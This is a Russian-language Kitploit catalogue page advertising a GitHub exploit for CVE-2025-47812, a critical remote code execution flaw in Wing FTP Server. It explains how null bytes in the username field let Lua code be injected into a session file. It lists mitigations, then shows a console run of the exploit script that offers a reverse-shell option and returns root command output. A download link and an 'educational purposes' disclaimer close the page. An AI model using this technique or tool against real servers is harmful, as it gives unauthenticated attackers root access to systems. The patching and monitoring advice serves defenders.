Skip to content
KitploitKITPLOIT
ИнструментыБлог
Log in
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Blackash-CVE-2025-47812 — CVE-2025-47812 | Kitploit
Инструменты/GitHubGitHub/dkstar11q/blackash-cve-2025-47812
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийОбучение и ОбразованиеИнструмент Удаленного ДоступаРазработка Полезной Нагрузки
GitHubdkstar11q/blackash-cve-2025-47812

Blackash-CVE-2025-47812

CVE-2025-47812

Репозиторий
121 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

🛡️ CVE-2025-47812 – Критическая RCE-уязвимость в Wing FTP Server 🛡️

🔎 Обзор:

CVE-2025-47812 — это критическая уязвимость удалённого выполнения кода (RCE), затрагивающая Wing FTP Server версий до 7.4.4. Она была обнаружена исследователем безопасности, и подтверждено, что она активно эксплуатируется в реальных атаках.


🧱 Корневая причина:

Уязвимость кроется в логике аутентификации Wing FTP Server, а именно в том, как сервер обрабатывает нулевые байты (\0) в параметре username.

Злоумышленники могут внедрить произвольный Lua-код через поле имени пользователя, который сервер запишет в файл сессии. Когда этот файл сессии обрабатывается позже, внедрённый Lua-код выполняется, что позволяет злоумышленникам запускать команды на уровне системы.


🚨 Воздействие:

  • Серьёзность: оценка CVSS 10.0 (критическая)
  • Требуемый доступ: достаточно неаутентифицированного или анонимного доступа
  • Эксплуатация: подтверждена активная эксплуатация
  • Получаемые привилегии: код выполняется как SYSTEM (Windows) или root (Linux/macOS)
  • Затронутые платформы: Windows, Linux и macOS

🔧 Меры по смягчению:

  • Немедленно обновите Wing FTP Server до версии 7.4.4 или более поздней.
  • Убедитесь, что публично доступные FTP-серверы не открывают /loginok.html для недоверенных сетей.
  • Отслеживайте логи на предмет необычных имён пользователей или внедрения Lua-кода.
  • Внедрите сегментацию сети, чтобы изолировать FTP-сервисы от внутренней инфраструктуры.

💀 Эксплойт:

┌──(kali㉿kali)-[~]
└─$ sudo python3 CVE-2025-47812.py
============================================================
   CVE-2025-47812 - Wing FTP Server RCE Exploit
============================================================
Target URL (e.g., http://localhost:5466): http://10.10.10.10
Username (e.g., anonymous): anonymous
1) Run Command
2) Get Reverse Shell
Your choice (1 or 2): 1
Command to execute (default: whoami): id
[*] Trying to get UID... Payload: id
[*] UID obtained: 1c3be4345d468da6443947f479c569978ec568a693d569774e7
[*] Sending /dir.html request...
[*] HTTP 200
------ Response Start ------
uid=0(root) gid=0(root) groups=0(root)
<?xml version="1.0" encoding="UTF-8" ?>
<alldata><nowdir><![CDATA[/]]></nowdir>
<dirdata>
</dirdata>
<nowquota>0</nowquota>
<maxquota>0</maxquota>
<readfile>1</readfile>
</alldata>


------ Response End ------

⚠️ Отказ от ответственности

Этот эксплойт предоставлен только в образовательных целях. Используйте его ответственно и только на тех системах, на тестирование которых у вас есть явное разрешение. Автор не несёт ответственности за любое неправомерное использование или ущерб, причинённый этим инструментом.

Скачать инструмент